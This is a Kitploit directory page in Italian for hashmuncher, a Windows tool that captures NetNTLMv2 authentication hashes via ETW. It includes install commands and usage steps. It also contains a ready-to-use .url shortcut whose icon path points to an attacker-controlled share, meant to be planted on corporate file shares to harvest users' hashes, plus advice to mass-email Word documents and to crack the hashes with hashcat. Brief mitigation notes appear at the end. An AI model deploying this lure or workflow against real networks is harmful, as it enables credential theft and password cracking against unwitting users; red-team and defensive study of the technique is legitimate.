Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
hashmuncher — Cattura gli hash NetNTLMv2 utilizzando ETW con diritti amministrativi su Windows 8.1 / Windows Server 2016 e versioni successive | Kitploit
Strumenti/GitHubGitHub/lkarlslund/hashmuncher
Sniffing e Analisi dei PacchettiAttacchi alle PasswordAnalisi HashRaccolta InformazioniPenetration TestingRed Teaming
GitHublkarlslund/hashmuncher

hashmuncher

Cattura gli hash NetNTLMv2 utilizzando ETW con diritti amministrativi su Windows 8.1 / Windows Server 2016 e versioni successive

Vedi Repository
126763 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Hash Muncher

Cattura hash NetNTLMv2 usando ETW con diritti amministrativi su Windows

GitHub all releases GitHub Workflow Status

  • Richiede accesso elevato (amministratore) su Windows 8.1 / Windows 2016 o successivi
  • Usa Event Tracing for Windows (ETW) per ottenere accesso ai dati grezzi dei pacchetti per i pacchetti di autenticazione SMB
  • Decodifica i messaggi NTLM di tipo 2 e 3
  • Output su stdout o su file
  • Premi Ctrl-C per interrompere l'elaborazione oppure usa l'opzione timeout
  • Cracca gli hash con HashCat usando -m 5600

Ottenere Hash Muncher

Tre diverse opzioni per installarlo e metterlo in funzione

A) Scarica i binari compilati automaticamente dalle release

B) Compila e installa su Windows con questo comando Go

  • richiede Golang
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) Compila in cross i binari Windows su qualsiasi piattaforma supportata da Golang con PowerShell installato

  • richiede Golang e PowerShell
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

Utilizzo

  1. Assicurati che Windows Firewall consenta "Condivisione file e stampanti" poiché Hash Muncher richiede che il servizio SMB integrato invii e riceva la richiesta iniziale e invii i pacchetti di risposta al target.

  2. In un prompt elevato esegui Hash Muncher

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. Ora attendi che qualcuno si autentichi contro la tua macchina, oppure piazza un collegamento URL su una condivisione file popolare come quella sotto.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

Sostituisci l'indirizzo IP con la tua macchina Hash Muncher e salva il file su una condivisione file (aziendale) come 'whatever.url', e guarda gli hash arrivare a raffica.

Ci sono altri metodi menzionati in Red Team Notes - Forced Authentication, e probabilmente puoi ottenere successo anche inviando a tutti un documento Word via email, ma non è affatto stealth.

Rilevamento

  • Nessuno che io abbia visto, ma per favore lascia un feedback

Mitigazione

  • Nessuna per la parte ETW, questo fa parte del design di Windows dice Microsoft
  • Usa password FORTI! Craccare NetNTLMv2 non è affatto veloce, ma con password deboli si può sicuramente fare.
  • Disabilita NTLM del tutto! Probabilmente non sarà indolore - ma vedi Farewell NTLM - It is time to disable NTLM

Storia

Ho giocato con ETW saltuariamente, ma quando ho visto la fantastica ricerca di Nettitude Labs ho capito che dovevo trasformarla in uno strumento facile da usare nel mio linguaggio preferito, Golang! Nettitude Labs ha un POC funzionante scritto in C# che gira sotto il framework .Net, e potrebbe essere un'opzione migliore per te. Quindi non sto davvero inventando nulla qui, sto solo aggiungendo questa alternativa.

Se ti piace la sicurezza su Windows, potresti apprezzare anche il mio strumento per grafi di attacco Adalanche

Scarica lo strumento